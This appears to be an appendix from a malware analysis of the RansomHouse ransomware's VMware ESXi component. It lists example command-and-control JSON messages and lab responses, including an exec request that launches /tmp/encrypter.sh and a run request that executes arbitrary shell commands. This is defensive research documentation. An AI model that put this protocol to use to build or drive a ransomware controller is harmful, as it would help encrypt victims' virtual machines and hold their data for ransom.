RansomHouse am See
By Pham Duy Phuc and Max Kersten, in collaboration with Noël Keijzer and Michaël Schrijver from Northwave
Appendix C - Example Command & Control requests
Info
Example c2 request:
{
"type": "info"
}
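Example c2 response (the `host` object below lists the `command` key twice; JSON parsers that keep only the last duplicate will read it as the empty string):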
{
"type": "info",
"id": "localhost+08:00:27:ac:4b:55",
"taskId": "(null)",
"taskReply": "completed",
"data":
{
"config":
{
"host":
{
"startIn": 0,
"pass": "undefined",
"command": "undefined",
"command": "",
"args": []
},
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"priority": 2,
"group": 0
}]
},
"status":
{
"errors": [],
"ip": "192.168.56.10",
"hostType": 1,
"progress": -1,
"startsIn": -1,
"runIterations": 1,
"currentRunIteration": 1,
"passchange": "",
"dropsess": false,
"welcomeset": false,
"rmlogs": false,
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"datastoreMountPoint": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",
"datastoreName": "datastore1",
"datastoreSize": "1.5G",
"done": 0,
"total": 3,
"processId": "",
"online": false,
"errors": [],
"files":
[{
"name": "test-flat.vmdk",
"state": 0
}, {
"name": "test.vmdk",
"state": 0
}, {
"name": "test.vmsd",
"state": 0
}]
}]
}
}
}
Config
Example c2 request:
{
"type": "config",
"config":
{
"host":
{
"startIn": 0,
"pass": "undefined",
"command": "undefined",
"command": "",
"args": []
}
}
}
Exec
Example c2 request:
{
"type": "exec",
"config":
{
"host":
{
"command": "/tmp/encrypter.sh"
}
}
}
Run
Example c2 request:
{
"type": "run",
"config":
{
"host":
{
"command": "uname -a"
}
}
}
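Example c2 response (the output of the requested command, here `uname -a`, is returned in the `desc` field of the `status.errors` array):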
{
"type": "info",
"id": "localhost+08:00:27:ac:4b:55",
"taskId": "(null)",
"taskReply": "completed",
"data":
{
"config":
{
"host":
{
"command": "uname -a",
"startIn": 0,
"pass": "undefined",
"command": "",
"args": []
},
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"priority": 2,
"group": 0
}]
},
"status":
{
"progress": -1,
"runIterations": 1,
"currentRunIteration": 1,
"dropsess": false,
"welcomeset": false,
"errors":
[{
"step": "",
"desc":
"VMkernel localhost 6.7.0 #1 SMP Release build-15160138 Nov 22 2019 20:49:31 x86_64 x86_64 x86_64 ESXi\n"
}],
"ip": "192.168.56.10",
"hostType": 1,
"startsIn": -1,
"passchange": "",
"rmlogs": false,
"vms":
[{
"name": "test",
"folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",
"datastoreMountPoint":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",
"datastoreName": "datastore1",
"datastoreSize": "1.5G",
"done": 0,
"total": 3,
"processId": "",
"online": false,
"errors": [],
"files":
[{
"name": "test-flat.vmdk",
"state": 0
}, {
"name": "test.vmdk",
"state": 0
}, {
"name": "test.vmsd",
"state": 0
}]
}]
}
}
}
Remove
Example c2 request:
{
"type": "remove",
"args": ["/tmp/test"]
}
Abort
Example c2 request:
{
"type": "abort"
}
Abort_f
Example c2 request:
{
"type": "abort_f"
}
Quit
Example c2 request:
{
"type": "quit"
}
Welcome
Example c2 request:
{
"type": "welcome",
"config":
{
"host":
{
"welcomeMsg": "NEW-WELCOME-MESSAGE"
}
}
}